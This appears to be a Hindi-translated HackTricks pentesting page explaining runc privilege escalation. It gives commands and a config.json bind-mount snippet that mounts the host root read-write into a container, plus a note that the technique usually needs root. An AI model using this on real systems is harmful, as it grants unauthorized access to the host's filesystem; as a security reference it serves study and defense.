hacktricks/linux-hardening/privilege-escalation/runc-privilege-escalation.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

6.6 KiB

RunC विशेषाधिकार उन्नयन

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

मूलभूत जानकारी

यदि आप अधिक जानना चाहते हैं runc के बारे में, तो निम्नलिखित पृष्ठ की जांच करें:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}

PE

यदि आपको लगता है कि runc होस्ट में स्थापित है, तो आप होस्ट के रूट / फ़ोल्डर को माउंट करके एक कंटेनर चला सकते हैं

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

{% hint style="danger" %} यह हमेशा काम नहीं करेगा क्योंकि runc की डिफ़ॉल्ट ऑपरेशन रूट के रूप में चलाना है, इसलिए इसे एक अनुप्रयोगी उपयोगकर्ता के रूप में चलाना संभव नहीं है (जब तक आपके पास एक रूटलेस कॉन्फ़िगरेशन नहीं है)। रूटलेस कॉन्फ़िगरेशन को डिफ़ॉल्ट बनाना आमतौर पर एक अच्छा विचार नहीं है क्योंकि रूटलेस कंटेनर्स के अंदर कई प्रतिबंध होते हैं जो रूटलेस कंटेनर्स के बाहर लागू नहीं होते हैं। {% endhint %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥